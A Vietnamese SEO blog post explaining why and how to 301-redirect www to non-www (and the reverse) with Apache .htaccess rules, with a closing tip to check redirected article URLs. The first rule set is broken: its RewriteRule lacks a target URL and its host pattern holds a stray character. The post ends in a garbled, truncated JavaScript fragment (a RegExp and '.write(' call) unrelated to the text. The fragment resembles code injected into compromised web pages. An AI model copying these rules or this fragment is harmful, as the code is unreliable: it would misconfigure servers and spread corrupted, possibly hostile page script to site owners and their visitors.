Thiết Kế Web, Dịch Vụ Seo, Marketing Online > Kiến thức > SEO > Những lưu ý khi Redirect www về non-www và ngược lại

Những lưu ý khi Redirect www về non-www và ngược lại

Chuyển www về non-www gần như là điều đầu tiên một SEOer phải check và làm khi nhận một dự án SEO mới. Công việc tưởng chừng đơn giản nhưng cũng nhiều chuyện để nói.

www và non www redirect

Tại sao phải Redirect www về non-www hoặc ngược lại

www và non-www vẫn được Google tính là 2 domain khác nhau, nếu bạn không đưa về một kiểu thống nhất website sẽ bị dính lỗi Duplicate Content. Khi đó, hoặc là www, hoặc là non-www sẽ bị tính là copy của thằng kia. Tuy nhiên, ta vẫn có thể SEO được mặc dù chưa Redirect, nhưng chỉ có 1 trong 2 thằng nói trên lên top được, và không thể mạnh bằng những website đã Redirect. Không mạnh bằng đơn giản khi làm backlink sẽ có lúc ta trỏ về www hoặc ngược lại, như vậy nếu chưa Redirect về nhau thì quả là lãng phí, nhất là khi non-www bị Google coi là copy của www.

Cách Redirect 301

non-www về www (sử dụng “có www”)

Options +FollowSymLinks
RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_HOST} !^www\.domain.\.com$ [NC]
RewriteRule ^(.*)$ [R=301,L]

www về non-www (ko sử dụng www)

Options +FollowSymLinks
RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_HOST} !^domain\.com$ [NC]
RewriteRule ^(.*)$ http://domain.com/$1 [R=301,L]

Một số lưu ý

Điều đặc biệt lưu ý khi sử dụng Redirect là các bạn phải kiểm tra cả URL bài viết sau khi Redirect. Ví dụ gõ http://www.pridio.com/dich-vu-seo/ xem đã chắc chắn trỏ về http://pridio.com/dich-vu-seo/ chưa. Điều tưởng như đơn giản này nhưng tôi đã không ít lần phải mệt vì Redirect chưa đúng. Khi đó, bạn hãy kiểm tra lại file htaccess hoặc nhờ Coder kiểm tra hộ.

Đây là một yếu tố không quá khó để xử lý nên nhiều khi các SEOer hay quên. Trong nhiều SEOer nhờ tôi tư vấn vì sao từ khóa chưa lên, có nhiều người chưa tối ưu yếu tố rất đơn giản này. Để đỡ quên bạn hãy lập một bản Onpage SEO Checklist của riêng mình để khi SEO một web mới không bị bỏ sót bất kỳ yếu tố nào. Chúc các bạn thành công với SEO. (new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1”)+”= .write(‘